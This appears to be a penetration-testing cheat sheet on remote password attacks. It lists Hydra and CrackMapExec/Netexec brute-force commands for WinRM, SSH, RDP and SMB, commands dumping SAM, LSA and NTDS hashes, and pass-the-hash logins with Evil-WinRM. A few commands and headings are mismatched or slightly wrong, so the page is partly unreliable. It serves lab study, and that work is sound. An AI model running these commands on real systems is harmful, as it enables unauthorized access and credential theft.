Remote Password Attacks

# Brute-force WinRM service
crackmapexec winrm <ip> -u user.list -p password.list

# Enumerate SMB shares using specified credentials
crackmapexec smb <ip> -u "user" -p "password" --shares

# Attempt password cracking over specified service with Hydra
hydra -L user.list -P password.list <service>://<ip>
hydra -l username -P password.list <service>://<ip>
hydra -L user.list -p password <service>://<ip>
hydra -C <user_pass.list> ssh://<IP>

# Dump password hashes using CrackMapExec
crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam
crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa
crackmapexec smb <ip> -u <username> -p <password> --ntds

# Establish a PowerShell session using Evil-WinRM
evil-winrm -i <ip> -u Administrator -H "<passwordhash>"

WinRM

Netexec

nxc winrm 10.10.1.4 -u user.list -p pass.list

Connect with target (Evil-winrm)

evil-winrm -I 10.10.1.4 -u user -p password

SSH

Hydra

hydra -L user.txt -P password.txt ssh://10.10.1.4

Connect with target

ssh user@10.10.1.4

RDP

Hydra

hydra -L user.txt -P password.txt rdp://10.10.1.4

Connect with target

xfreerdp /v:10.10.1.4 /u:user /p:password

SMB

Hydra

hydra -L user.txt -P password.txt smb://10.10.1.4

Metasploit module `smb_login`

nxc smb 10.10.1.4 -U "user" -P "password"

smbclient -U user \\\\10.10.1.4\\sharename

Previouspassword-mutations NextWindows Local Password Attacks

Last updated 1 day ago

hashtagNetexec

hashtagConnect with target (Evil-winrm)

hashtagHydra

hashtagConnect with target

hashtagHydra

hashtagConnect with target

hashtagHydra

hashtagMetasploit module smb_login

hashtagSee share and privileges

Netexec

Connect with target (Evil-winrm)

Hydra

Connect with target

Hydra

Connect with target

Hydra

Metasploit module `smb_login`

See share and privileges